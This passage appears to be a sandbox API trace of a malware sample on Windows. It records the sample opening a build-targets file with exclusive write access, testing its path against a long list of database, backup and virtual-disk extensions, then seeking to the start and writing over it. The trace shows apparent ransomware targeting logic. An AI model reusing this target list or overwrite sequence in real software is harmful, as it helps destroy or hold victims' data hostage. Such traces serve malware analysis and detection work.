(x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets")) returned 0x20 [0140.338] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.338] GetLastError () returned 0x0 [0140.338] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=764) returned 1 [0140.338] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".4dd") returned 0x0 [0140.338] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".4dl") returned 0x0 [0140.338] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accdb") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accdc") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accde") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accdr") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accdt") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accft") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".adb") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ade") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".adf") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".adp") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".arc") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ora") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".alf") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ask") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".btr") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".bdf") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".cat") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".cdb") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ckp") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".cma") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".cpd") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dacpac") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dad") returned 0x0 [0140.339] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dadiagrams") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".daschema") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".db") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".db-shm") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".db-wal") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".db3") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbc") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbf") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbs") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbt") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbv") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dbx") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dcb") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dct") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dcx") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ddl") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dlis") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dp1") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dqy") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dsk") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dsn") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dtsx") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".dxl") returned 0x0 [0140.340] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".eco") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ecx") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".edb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".epim") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".exb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fcd") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fdb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fic") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fmp") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fmp12") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fmpsl") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fol") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fp3") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fp4") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fp5") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fp7") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fpt") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".frm") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".gdb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".grdb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".gwi") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".hdb") returned 0x0 [0140.341] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".his") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ib") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".idb") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ihx") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".itdb") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".itw") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".jet") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".jtx") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".kdb") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".kexi") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".kexic") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".kexis") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".lgc") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".lwx") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".maf") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".maq") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mar") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mas") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mav") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mdb") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mdf") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mpd") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mrg") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mud") returned 0x0 [0140.342] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mwb") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".myd") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ndf") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nnt") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nrmlib") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ns2") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ns3") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".ns4") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nsf") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nv") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nv2") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nwdb") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nyf") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".odb") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".oqy") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".orx") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".owc") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".p96") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".p97") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".pan") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".pdb") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".pdm") returned 0x0 [0140.343] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".pnz") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".qry") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".qvd") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rbf") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rctd") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rod") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rodx") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rpd") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".rsd") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sas7bdat") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sbf") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".scx") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sdb") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sdc") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sdf") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sis") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".spq") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sql") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sqlite") returned 0x0 [0140.344] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sqlite3") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".sqlitedb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".te") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".temx") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".tmd") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".tps") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".trc") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".trm") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".udb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".udl") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".usr") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".v12") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vis") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vpd") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vvv") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".wdb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".wmdb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".wrk") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".xdb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".xld") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".xmlff") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".abcddb") returned 0x0 [0140.345] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".abs") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".abx") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".accdw") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".adn") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".db2") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".fm5") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".hjt") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".icg") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".icr") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".kdb") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".lut") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".maw") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mdn") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".mdt") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vdi") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vhd") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmdk") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".pvm") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmem") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmsn") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmsd") returned 0x0 [0140.346] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".nvram") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmx") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".raw") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".qcow2") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".subvol") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".bin") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vsv") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".avhd") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmrs") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vhdx") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".avdx") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".vmcx") returned 0x0 [0140.347] StrStrIW (lpFirst="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpSrch=".iso") returned 0x0 [0140.347] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.347] WriteFile (in: hFile=0x6c8, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, 